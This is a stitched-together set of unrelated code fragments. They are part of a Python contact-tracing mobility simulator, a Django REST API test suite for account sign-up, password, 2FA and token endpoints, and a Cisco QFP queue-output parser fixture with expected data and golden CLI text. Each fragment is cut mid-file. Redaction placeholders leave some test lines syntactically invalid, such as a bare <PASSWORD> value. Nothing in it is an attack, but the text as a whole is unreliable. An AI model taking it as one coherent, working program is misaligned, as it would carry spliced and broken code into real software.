mob_traces_at_site[v.site].append(v)
# dict of dict of list of contacts:
# i.e. contacts[i][j][k] = "k-th contact from i to j"
contacts = {i: defaultdict(InterLap) for i in range(self.num_people)}
# For each site s
for s in range(self.num_sites):
if self.verbose:
print('Checking site '+str(s+1)+'/'+str(self.num_sites), end='\r')
if len(mob_traces_at_site[s]) == 0:
continue
# Init the interval overlap matcher
inter = InterLap()
inter.update(mob_traces_at_site[s])
# Match contacts
for v in mob_traces_at_site[s]:
v_time = (v.t_from, v.t_to)
for vo in list(inter.find(other=v_time)):
# Ignore contacts with same individual
if v.indiv == vo.indiv:
continue
# Compute contact time
c_t_from = max(v.t_from, vo.t_from)
c_t_to = min(v.t_to, vo.t_to_shifted)
if c_t_to > c_t_from:
# Set contact tuple
c = Contact(t_from=c_t_from,
t_to=c_t_to,
indiv_i=v.indiv,
indiv_j=vo.indiv,
id_tup=(v.id, vo.id),
site=s,
duration=c_t_to - c_t_from)
# Add it to interlap
contacts[v.indiv][vo.indiv].update([c])
return contacts
def _group_mob_traces(self, mob_traces):
"""Group `mob_traces` by individual and site for faster queries.
Returns a dict of dict of Interlap of the form:
mob_traces_dict[i][s] = "Interlap of visits of indiv i at site s"
"""
mob_traces_dict = {i: defaultdict(InterLap) for i in range(self.num_people)}
for v in mob_traces:
mob_traces_dict[v.indiv][v.site].update([v])
return mob_traces_dict
def simulate(self, max_time, seed=None):
"""
Simulate contacts between individuals in time window [0, max_time].
Parameters
----------
max_time : float
Maximum time to simulate
seed : int
Random seed for mobility simulation
Returns
-------
contacts : list of list of tuples
A list of namedtuples containing the list of all contacts as
namedtuples ('time_start', 'indiv_j', 'duration'), where:
- `time_start` is the time the contact started
- 'indiv_j' is the id of the individual the contact was with
- 'duration' is the duration of the contact
"""
self.max_time = max_time
# Simulate mobility of each individuals to each sites
if self.verbose:
print(f'Simulate mobility for {max_time:.2f} time units... ',
end='', flush=True)
all_mob_traces = self._simulate_mobility(max_time, seed)
if self.verbose:
print(f'Simulated {len(all_mob_traces)} visits.', flush=True)
# Find the contacts in all sites in the histories
if self.verbose:
print(f'Find contacts... ', end='')
self.contacts = self._find_contacts(all_mob_traces)
# FIXME: contact_count calculation takes too long
# self.contact_count = sum(len(self.contacts[i][j]) for i in range(
# self.num_people) for j in range(self.num_people))
# if self.verbose:
# print(f'Found {self.contact_count} contacts', flush=True)
def list_intervals_in_window_individual_at_site(self, *, indiv, site, t0, t1):
"""Return a generator of Intervals of all visits of `indiv` is at site
`site` that overlap with [t0, t1]
FIXME: Make sure that this query is correct
"""
for visit in self.mob_traces[indiv][site].find((t0, t1)):
# Match on (`t_form`, `t_to_shifted`), need to filter out visits
# that ended before `t0`, i.e. visits such that `t_to` <= `t0`
# FIXME: This could be made easier by using the non-shifted
# intervals in `self.mob_traces`
if visit.t_to > t0:
yield Interval(visit.t_from, visit.t_to)
def is_in_contact(self, *, indiv_i, indiv_j, t, site=None):
"""Indicate if individuals `indiv_i` is within `delta` time to
make contact with `indiv_j` at time `t` in site `site`, and return contact if possible
"""
try:
# Find contact matching time and check site
contact = next(self.contacts[indiv_i][indiv_j].find((t, t)))
return (site is None) or (contact.site == site), contact
except StopIteration: # No such contact, call to `next` failed
return False, None
def will_be_in_contact(self, *, indiv_i, indiv_j, t, site=None):
"""Indicate if individuals | |
<reponame>robpop/explore_engine
from django.urls import reverse
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.test import APITestCase, APIClient
from django.contrib.auth.models import User
from account.models import Profile
class AccountTests(APITestCase):
def setUp(self):
self.superuser = User.objects.create_user(username='unsift', email='<EMAIL>', password='<PASSWORD>!')
self.account = User.objects.create_user(username='test', email='<EMAIL>', password='<PASSWORD>!')
self.verified_email_account = User.objects.create_user(username='verified', email='<EMAIL>', password='<PASSWORD>!')
self.superuser_token = Token.objects.get(user__username='unsift')
self.account_token = Token.objects.get(user__username='test')
self.verified_email_account_token = Token.objects.get(user__username='verified')
verified_profile = Profile.objects.get(account=self.verified_email_account)
verified_profile.emailVerified = True
verified_profile.save()
def test_api_root(self):
url = reverse('api:api-root')
data = {}
response = self.client.get(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
# username-check tests
def test_username_check(self):
url = reverse('api:username-check')
data = {
'username': 'available'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, 'Username is available')
def test_username_check_without_username(self):
url = reverse('api:username-check')
data = {}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {'username': ['This field is required']})
def test_username_check_with_blank_username(self):
url = reverse('api:username-check')
data = {
'username': ''
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {'username': ['This field must not be blank']})
def test_username_check_with_taken_username(self):
url = reverse('api:username-check')
data = {
'username': 'abcABC123.-_!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, 'Username is not valid')
# sign-up tests
def test_signup(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data, {
"username": "available",
"email": "<EMAIL>"
})
def test_signup_without_username(self):
url = reverse('api:sign-up')
data = {
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {'username': ['This field is required.']})
def test_signup_with_invalid_username(self):
url = reverse('api:sign-up')
data = {
'username': 'abcABC123.-_!',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'username': ['This value does not match the required pattern.']
})
def test_signup_with_short_username(self):
url = reverse('api:sign-up')
data = {
'username': 'abc',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'username': ['Ensure this field has at least 4 characters.']
})
def test_signup_with_long_username(self):
url = reverse('api:sign-up')
data = {
'username': 'abcdefghijklmnopqrstuvwxyzabcde',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'username': ['Ensure this field has no more than 30 characters.']
})
def test_signup_with_taken_username(self):
url = reverse('api:sign-up')
data = {
'username': 'test',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'username': ['This field must be unique.']
})
def test_signup_without_email(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'email': ['This field is required.']
})
def test_signup_with_invalid_email(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': 'invalid',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'email': ['Enter a valid email address.']
})
def test_signup_with_taken_email(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'email': ['This email is in use by an existing account']
})
def test_signup_without_password(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': '<EMAIL>'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'password': ['<PASSWORD>.']
})
def test_signup_with_all_lowercase_common_password(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': '<EMAIL>',
'password': '<PASSWORD>'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
"non_field_errors": [
"This password is too short. It must contain at least 8 characters.",
"This password is too common.",
"The password must contain at least 1 uppercase letter, A-Z.",
"The password must contain at least 1 digit, 0-9.",
"The password must contain at least 1 symbol."
]
})
def test_signup_with_all_uppercase_common_password(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': '<EMAIL>',
'password': '<PASSWORD>'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
"non_field_errors": [
"This password is too short. It must contain at least 8 characters.",
"This password is too common.",
"The password must contain at least 1 lowercase letter, a-z.",
"The password must contain at least 1 digit, 0-9.",
"The password must contain at least 1 symbol."
]
})
def test_signup_with_similar_password_to_username(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
"non_field_errors": [
"The password is too similar to the username."
]
})
def test_signup_with_similar_password_to_email(self):
url = reverse('api:sign-up')
data = {
'username': 'available',
'email': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
"non_field_errors": [
"The password is too similar to the email address."
]
})
# is-2fa-enabled tests
# MANUAL TESTING REQUIRED
# test_is_2fa_enabled_with_2fa_enabled
def test_is_2fa_enabled_without_authentication(self):
url = reverse('api:is-2fa-enabled')
data = {}
response = self.client.get(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(response.data, {
"detail": "Authentication credentials were not provided."
})
def test_is_2fa_enabled_with_2fa_disabled(self):
url = reverse('api:is-2fa-enabled')
data = {}
token = self.account_token
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
response = client.get(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, False)
# disable-2fa tests
# MANUAL TESTING REQUIRED
# test_disable_2fa_with_2fa_enabled
# test_disable_2fa_with_2fa_enabled_and_without_password
# test_disable_2fa_with_2fa_enabled_and_without_2fa_token
# test_disable_2fa_with_2fa_enabled_and_with_incorrect_length_2fa_token
# test_disable_2fa_with_2fa_enabled_and_with_non_integer_2fa_token
# test_disable_2fa_with_2fa_enabled_and_with_incorrect_2fa_token
# test_disable_2fa_with_2fa_enabled_and_with_incorrect_password
def test_disable_2fa_without_authentication(self):
url = reverse('api:disable-2fa')
data = {
'password': '<PASSWORD>!',
'token': <PASSWORD>
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(response.data, {
"detail": "Authentication credentials were not provided."
})
def test_disable_2fa_with_2fa_disabled(self):
url = reverse('api:disable-2fa')
data = {
'password': '<PASSWORD>!',
'token': <PASSWORD>
}
token = self.account_token
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
response = client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, 'This account does not have two-factor authentication enabled')
# obtain-api-token tests
# MANUAL TESTING REQUIRED
# test_obtain_api_token_with_2fa_enabled
# test_obtain_api_token_with_2fa_enabled_and_without_2fa_token
# test_obtain_api_token_with_2fa_enabled_and_with_incorrect_length_2fa_token
# test_obtain_api_token_with_2fa_enabled_and_with_non_integer_2fa_token
# test_obtain_api_token_with_2fa_enabled_and_with_incorrect_2fa_token
def test_obtain_api_token(self):
url = reverse('api:obtain-api-token')
data = {
'username': 'test',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, {
'token': self.account_token.key
})
def test_obtain_api_token_with_email_for_username_field(self):
url = reverse('api:obtain-api-token')
data = {
'username': '<EMAIL>',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, {
'token': self.account_token.key
})
def test_obtain_api_token_without_username(self):
url = reverse('api:obtain-api-token')
data = {
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
"username, password": [
"Both of these fields are required"
]
})
def test_obtain_api_token_without_password(self):
url = reverse('api:obtain-api-token')
data = {
'username': 'test'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
"username, password": [
"Both of these fields are required"
]
})
def test_obtain_api_token_with_invalid_username(self):
url = reverse('api:obtain-api-token')
data = {
'username': 'unknown',
'password': '<PASSWORD>!'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
"username": [
"The provided username or email is invalid"
]
})
def test_obtain_api_token_with_incorrect_password(self):
url = reverse('api:obtain-api-token')
data = {
'username': 'test',
'password': '<PASSWORD>'
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, 'The provided credentials are invalid')
# change-password tests
def test_change_password(self):
url = reverse('api:change-password')
data = {
'old_password': '<PASSWORD>!',
'new_password': '<PASSWORD>!'
}
token = self.account_token
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
response = client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data, 'Success')
def test_change_password_without_authentication(self):
url = reverse('api:change-password')
data = {
'old_password': '<PASSWORD>!',
'new_password': '<PASSWORD>!'
}
response = self.client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(response.data, {
'detail': 'Authentication credentials were not provided.'
})
def test_change_password_without_old_password(self):
url = reverse('api:change-password')
data = {
'new_password': '<PASSWORD>!'
}
token = self.account_token
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
response = client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'old_password': [
'This field is required.'
]
})
def test_change_password_with_incorrect_old_password(self):
url = reverse('api:change-password')
data = {
'old_password': '<PASSWORD>',
'new_password': '<PASSWORD>!'
}
token = self.account_token
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
response = client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'old_password': [
'This password is incorrect'
]
})
def test_change_password_with_short_old_password(self):
url = reverse('api:change-password')
data = {
'old_password': '<PASSWORD>',
'new_password': '<PASSWORD>!'
}
token = self.account_token
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
response = client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'old_password': [
'Ensure this field has at least 8 characters.'
]
})
def test_change_password_with_long_old_password(self):
url = reverse('api:change-password')
data = {
'old_password': '<PASSWORD>',
'new_password': '<PASSWORD>!'
}
token = self.account_token
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
response = client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {
'old_password': [
| |
{'if_h': 29,
'index': {'0': {'name': 'GigabitEthernet1/0/4',
'queue_id': '0xa3',
'software_control_info': {'cache_queue_id': '0x000000a3',
'debug_name': 'GigabitEthernet1/0/4',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 105000000,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x281',
'plevel': 0,
'port_uidb': 245731,
'priority': 65535,
'qlimit_bytes': 3281312,
'share': 1,
'sw_flags': '0x08000011',
'sw_state': '0x00000c01',
'wred': '0x88b16a92'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}}}},
'GigabitEthernet1/0/5': {'if_h': 30,
'index': {'0': {'name': 'GigabitEthernet1/0/5',
'queue_id': '0xa4',
'software_control_info': {'cache_queue_id': '0x000000a4',
'debug_name': 'GigabitEthernet1/0/5',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 105000000,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x282',
'plevel': 0,
'port_uidb': 245730,
'priority': 65535,
'qlimit_bytes': 3281312,
'share': 1,
'sw_flags': '0x08000011',
'sw_state': '0x00000c01',
'wred': '0x88b16aa2'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}}}},
'GigabitEthernet1/0/6': {'if_h': 31,
'index': {'0': {'name': 'GigabitEthernet1/0/6',
'queue_id': '0xa5',
'software_control_info': {'cache_queue_id': '0x000000a5',
'debug_name': 'GigabitEthernet1/0/6',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 105000000,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x283',
'plevel': 0,
'port_uidb': 245729,
'priority': 65535,
'qlimit_bytes': 3281312,
'share': 1,
'sw_flags': '0x08000011',
'sw_state': '0x00000c01',
'wred': '0x88b16ab2'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}}}},
'GigabitEthernet1/0/7': {'if_h': 32,
'index': {'0': {'name': 'GigabitEthernet1/0/7',
'queue_id': '0xa6',
'software_control_info': {'cache_queue_id': '0x000000a6',
'debug_name': 'GigabitEthernet1/0/7',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 105000000,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x284',
'plevel': 0,
'port_uidb': 245728,
'priority': 65535,
'qlimit_bytes': 3281312,
'share': 1,
'sw_flags': '0x08000011',
'sw_state': '0x00000c01',
'wred': '0x88b16ac2'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}}}},
'Loopback0': {'if_h': 33},
'Loopback2': {'if_h': 34},
'Null0': {'if_h': 6},
'TenGigabitEthernet0/2/0': {'if_h': 23,
'index': {'0': {'name': 'TenGigabitEthernet0/2/0',
'queue_id': '0x9d',
'software_control_info': {'cache_queue_id': '0x0000009d',
'debug_name': 'TenGigabitEthernet0/2/0',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 1050000000,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x27a',
'plevel': 0,
'port_uidb': 245737,
'priority': 65535,
'qlimit_bytes': 32812544,
'share': 1,
'sw_flags': '0x08000011',
'sw_state': '0x00000c01',
'wred': '0x88b16a32'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}}}},
'TenGigabitEthernet0/3/0': {'if_h': 24,
'index': {'0': {'name': 'TenGigabitEthernet0/3/0',
'queue_id': '0x9e',
'software_control_info': {'cache_queue_id': '0x0000009e',
'debug_name': 'TenGigabitEthernet0/3/0',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 1050000000,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x27b',
'plevel': 0,
'port_uidb': 245736,
'priority': 65535,
'qlimit_bytes': 32812544,
'share': 1,
'sw_flags': '0x08000011',
'sw_state': '0x00000c01',
'wred': '0x88b16a42'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}}}},
'VPLS-2320.1020896': {'if_h': 4260},
'VPLS-2321.1020897': {'if_h': 4261},
'VPLS-2322.1020898': {'if_h': 4262},
'VPLS-2816.102080a': {'if_h': 4120},
'VPLS-2817.102080b': {'if_h': 4121},
'VPLS-2818.102080c': {'if_h': 4122},
'VPLS-2819.102080d': {'if_h': 4123},
'VPLS-2820.102080e': {'if_h': 4124},
'VPLS-2944.10207e2': {'if_h': 4080},
'VPLS-2945.10207e3': {'if_h': 4081},
'VPLS-2946.10207e4': {'if_h': 4082},
'VPLS-2974.10207fb': {'if_h': 4105},
'VPLS-2975.10207fc': {'if_h': 4106},
'VPLS-3049.1020890': {'if_h': 4254},
'VPLS-3050.1020891': {'if_h': 4255},
'VPLS_maint.1020a6b': {'if_h': 4729},
'internal0/0/crypto:0': {'if_h': 4,
'index': {'0': {'name': 'i2l_if_4_cpp_0_prio0',
'queue_id': '0x8b',
'software_control_info': {'cache_queue_id': '0x0000008b',
'debug_name': 'i2l_if_4_cpp_0_prio0',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 0,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x265',
'plevel': 0,
'port_uidb': 245756,
'priority': 65535,
'qlimit_bytes': 80000064,
'share': 1,
'sw_flags': '0x08001001',
'sw_state': '0x00000c01',
'wred': '0x88b168f1'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}},
'1': {'name': 'i2l_if_4_cpp_0_prio1',
'queue_id': '0x8c',
'software_control_info': {'cache_queue_id': '0x0000008c',
'debug_name': 'i2l_if_4_cpp_0_prio1',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 0,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x266',
'plevel': 1,
'port_uidb': 245756,
'priority': 0,
'qlimit_bytes': 80000064,
'share': 0,
'sw_flags': '0x18001001',
'sw_state': '0x00000c01',
'wred': '0x88b16901'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 0,
'total_enqs_packets': 0}}}},
'internal0/0/recycle:0': {'if_h': 1},
'internal0/0/rp:0': {'if_h': 2,
'index': {'0': {'name': 'i2l_if_2_cpp_0_prio0',
'queue_id': '0x87',
'software_control_info': {'cache_queue_id': '0x00000087',
'debug_name': 'i2l_if_2_cpp_0_prio0',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 0,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x263',
'plevel': 0,
'port_uidb': 245758,
'priority': 65535,
'qlimit_bytes': 3125056,
'share': 1,
'sw_flags': '0x08000001',
'sw_state': '0x00000c01',
'wred': '0x88b16872'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 294475395,
'total_enqs_packets': 4297477}},
'1': {'name': 'i2l_if_2_cpp_0_prio1',
'queue_id': '0x88',
'software_control_info': {'cache_queue_id': '0x00000088',
'debug_name': 'i2l_if_2_cpp_0_prio1',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 0,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x263',
'plevel': 1,
'port_uidb': 245758,
'priority': 0,
'qlimit_bytes': 3125056,
'share': 0,
'sw_flags': '0x18000001',
'sw_state': '0x00000c01',
'wred': '0x88b16882'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 203225236,
'total_enqs_packets': 1201820}}}},
'internal0/0/rp:1': {'if_h': 3,
'index': {'0': {'name': 'i2l_if_3_cpp_0_prio0',
'queue_id': '0x89',
'software_control_info': {'cache_queue_id': '0x00000089',
'debug_name': 'i2l_if_3_cpp_0_prio0',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 0,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x264',
'plevel': 0,
'port_uidb': 245757,
'priority': 65535,
'qlimit_bytes': 3125056,
'share': 1,
'sw_flags': '0x08000001',
'sw_state': '0x00000c01',
'wred': '0x88b168b2'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 46447411,
'total_enqs_packets': 670805}},
'1': {'name': 'i2l_if_3_cpp_0_prio1',
'queue_id': '0x8a',
'software_control_info': {'cache_queue_id': '0x0000008a',
'debug_name': 'i2l_if_3_cpp_0_prio1',
'defer_obj_refcnt': 0,
'max': 0,
'max_dflt': 0,
'max_qos': 0,
'min': 0,
'min_dflt': 0,
'min_qos': 0,
'orig_max': 0,
'orig_min': 0,
'parent_sid': '0x264',
'plevel': 1,
'port_uidb': 245757,
'priority': 0,
'qlimit_bytes': 3125056,
'share': 0,
'sw_flags': '0x18000001',
'sw_state': '0x00000c01',
'wred': '0x88b168c2'},
'statistics': {'lic_throughput_oversub_drops_bytes': 0,
'lic_throughput_oversub_drops_packets': 0,
'queue_depth_bytes': 0,
'tail_drops_bytes': 0,
'tail_drops_packets': 0,
'total_enqs_bytes': 269658370,
'total_enqs_packets': 1424992}}}}}
golden_output_active = {'execute.return_value': '''\
Router# show platform hardware qfp active infrastructure bqs queue output default all
Load for five secs: 2%/1%; one minute: 9%; five minutes: 8%
Time source is NTP, 07:47:13.438 EST Thu Sep 8 2016
Interface: internal0/0/recycle:0 QFP: 0.0 if_h: 1 Num Queues/Schedules: 0
No Queue/Schedule Info
Interface: internal0/0/rp:0 QFP: 0.0 if_h: 2 Num Queues/Schedules: 2
Queue specifics:
Index 0 (Queue ID:0x87, Name: i2l_if_2_cpp_0_prio0)
Software Control Info:
(cache) queue id: 0x00000087, wred: 0x88b16872, qlimit (bytes): 3125056
parent_sid: 0x263, debug_name: i2l_if_2_cpp_0_prio0
sw_flags: 0x08000001, sw_state: 0x00000c01, port_uidb: 245758
orig_min : 0 , min: 0
min_qos : 0 , min_dflt: 0
orig_max : 0 , max: 0
max_qos : 0 , max_dflt: 0
share : 1
plevel : 0, priority: 65535
defer_obj_refcnt: 0
Statistics:
tail drops (bytes): 0 , (packets): 0
total enqs (bytes): 294475395 , (packets): 4297477
queue_depth (bytes): 0
licensed throughput oversubscription drops:
(bytes): 0 , (packets): 0
Queue specifics:
Index 1 (Queue ID:0x88, Name: i2l_if_2_cpp_0_prio1)
Software Control Info:
(cache) queue id: 0x00000088, wred: 0x88b16882, qlimit (bytes): 3125056
parent_sid: 0x263, debug_name: i2l_if_2_cpp_0_prio1
sw_flags: 0x18000001, sw_state: 0x00000c01, port_uidb: 245758
orig_min : 0 , min: 0
min_qos : 0 , min_dflt: 0
orig_max : 0 , max: 0
max_qos : 0 , max_dflt: 0
share : 0
plevel : 1, priority: 0
defer_obj_refcnt: 0
Statistics:
tail drops (bytes): 0 , (packets): 0
total enqs (bytes): 203225236 , (packets): 1201820
queue_depth (bytes): 0
licensed throughput oversubscription drops:
(bytes): 0 , (packets): 0
Interface: internal0/0/rp:1 QFP: 0.0 if_h: 3 Num Queues/Schedules: 2
Queue specifics:
Index 0 (Queue ID:0x89, Name: i2l_if_3_cpp_0_prio0)
Software Control Info:
(cache) queue id: 0x00000089, wred: 0x88b168b2, qlimit (bytes): 3125056
parent_sid: 0x264, debug_name: i2l_if_3_cpp_0_prio0
sw_flags: 0x08000001, sw_state: 0x00000c01, port_uidb: 245757
orig_min : 0 , min: 0
min_qos : 0 , min_dflt: 0
orig_max : 0 , max: 0
